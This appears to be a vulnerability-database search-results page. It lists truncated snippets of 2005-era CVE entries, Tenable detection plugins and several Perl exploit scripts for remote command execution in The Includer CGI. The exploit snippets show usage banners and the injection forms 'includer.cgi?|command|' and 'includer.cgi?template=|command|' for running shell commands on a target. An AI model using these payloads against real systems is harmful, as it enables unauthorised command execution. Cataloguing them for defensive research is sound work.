9786 matches found
Websense Reporting Console Detection
The remote host appears to be running Websense, and connections are allowed to the web reporting console. A remote attacker could use information gathered from this access to mount further attacks. (C) Tenable Network Security, Inc. include("compat.inc"); if (description) { script_id(18177);...
PHP, ASP, CGI web applications security vulnerabilities
PHP inclusions, SQL injections, directory traversals, cross-site scripting, etc...
CVE-2005-1355
CVE-2005-1355 affects includer.cgi in The Includer and enables remote attackers to read arbitrary files by supplying a full pathname in the argument (a directory traversal issue). The connected record for CVE-2005-0801 confirms the pattern: directory traversal via .. or a full pathname in the URL...
CVE-2005-1344
Buffer overflow in htdigest in Apache 2.0.52 may allow attackers to execute arbitrary code via a long realm argument. NOTE: since htdigest is normally only locally accessible and not setuid or setgid, there are few attack vectors which would lead to an escalation of privileges, unless htdigest is...
remote command execution in inserter.cgi script
Tunis 24/04/2005 BUG found by fireboy [email protected] THERE ARE SOME BUGS IN inserter.cgi SCRIPT THAT CAN SHOW SENSIBLE FILES IN A SYSTEM OR EXECUTE COMMANDS IN THE TARGET HOST WHICH CAN COMPROMISE IT. IT IS ONLY FOR SECURITY AND EDUCATIONAL PURPOSE 1file showing...
Horde Turba Detection
The remote host is running Turba, a PHP-based addressbook / contact management utility from the Horde Project. (C) Tenable Network Security, Inc. include("compat.inc"); if (description) { script_id(18137); script_version("1.24"); script_set_attribute(attribute:"plugin_modification_date", value:"2022/10/12");...
CVE-2001-1457
Buffer overflow in CrazyWWWBoard 2000p4 and 2000LEp5 allows remote attackers to execute arbitrary code via a long HTTP_USER_AGENT CGI environment variable...
CVE-2001-1457
CVE-2001-1457 concerns a buffer overflow in CrazyWWWBoard 2000p4 and 2000LEp5. The underlying issue is a vulnerability in handling a long HTTP_USER_AGENT CGI environment variable, allowing a remote attacker to potentially execute arbitrary code. Affected software is CrazyWWWBoard 2000 series (p4 an...
includer10.pl.txt
Target - The Includer CGI \n\n"; print " - Host name of taget.\n"; print " - If not in dir type / symbol.\n"; print " - command for execution.\n\n"; print " Examples:\n\n"; print " incl10.pl 127.0.0.1 /cgi-bin/ "ls -la"\n"; print " incl10.pl 127.0.0.1 / "uname -a"\n"; print " incl10.pl...
PHP: Multiple vulnerabilities
Background: PHP is a general-purpose scripting language widely used to develop web-based applications. It can run inside a web server using the mod_php module or the CGI version of PHP, or can run stand-alone in a CLI. Description: An integer overflow and an unbound recursion were discovered in the...
Serendipity Detection
Serendipity, a PHP-based blog application, is running on the remote host. (C) Tenable Network Security, Inc. include("compat.inc"); if (description) { script_id(18054); script_version("1.19"); script_set_attribute(attribute:"plugin_modification_date", value:"2022/06/01"); script_name(english:"Serendipity Detection");...
The Includer CGI 1.0 - Remote Command Execution (3)
The Includer CGI 1.0 - Remote Command Execution 3 !/usr/bin/perl K-C0d3r Includer.cgi 1.0 remote command execution K-C0d3r C0d3d By K-C0d3r, a www.x0n3-h4ck.org friend! I think the bug was discovered by Francisco Alisson. Greetz to: mZ, CorryL, Expanders, SiNaPsE, off, rikky, milw0rm. FK of to al...
The Includer CGI <= 1.0 Remote Command Execution (new version)
Exploit for cgi platform in category web applications ============================================================== The Includer CGI \n\n"; print " - Host name of taget.\n"; print " - If not in dir type / symbol.\n"; print " - command for execution.\n\n"; print " Examples:\n\n"; print " incl10.p...
The Includer CGI <= 1.0 Remote Command Execution (new version)
No description provided by source. !/usr/bin/perl Target - The Includer CGI = 1.0 Based on - http://www.milw0rm.com/id.php?id=862 Info about bug - Stupid use "Open" function. If you want know more visit our home page at nst.void.ru use IO::Socket; if @ARGV 3 print " \n Includer CGI = 1.0 Network...
The Includer CGI 1.0 - Remote Command Execution (2)
The Includer CGI 1.0 - Remote Command Execution 2 !/usr/bin/perl Target - The Includer CGI \n\n"; print " - Host name of taget.\n"; print " - If not in dir type / symbol.\n"; print " - command for execution.\n\n"; print " Examples:\n\n"; print " incl10.pl 127.0.0.1 /cgi-bin/ "ls -la"\n"; print "...
The Includer CGI <= 1.0 Remote Command Execution (new version2)
Exploit for cgi platform in category web applications =============================================================== The Includer CGI .\n"; print STDERR "Exploitation Types:\n \t\t1: includer.cgi?|command|\n \t\t2: includer.cgi?template=|command|\n\n"; exit; if @ARGV 3 Usage; $host = @ARGV0; $pa...
The Includer CGI 1.0 - Remote Command Execution (3)
!/usr/bin/perl K-C0d3r Includer.cgi 1.0 remote command execution K-C0d3r C0d3d By K-C0d3r, a www.x0n3-h4ck.org friend! I think the bug was discovered by Francisco Alisson. Greetz to: mZ, CorryL, Expanders, SiNaPsE, off, rikky, milw0rm. FK of to all RxBot kiddies as et, Gn, db. kc@K-C0d3r xpl$ per...
The Includer CGI 1.0 - Remote Command Execution (2)
!/usr/bin/perl Target - The Includer CGI \n\n"; print " - Host name of taget.\n"; print " - If not in dir type / symbol.\n"; print " - command for execution.\n\n"; print " Examples:\n\n"; print " incl10.pl 127.0.0.1 /cgi-bin/ "ls -la"\n"; print " incl10.pl 127.0.0.1 / "uname -a"\n"; print "...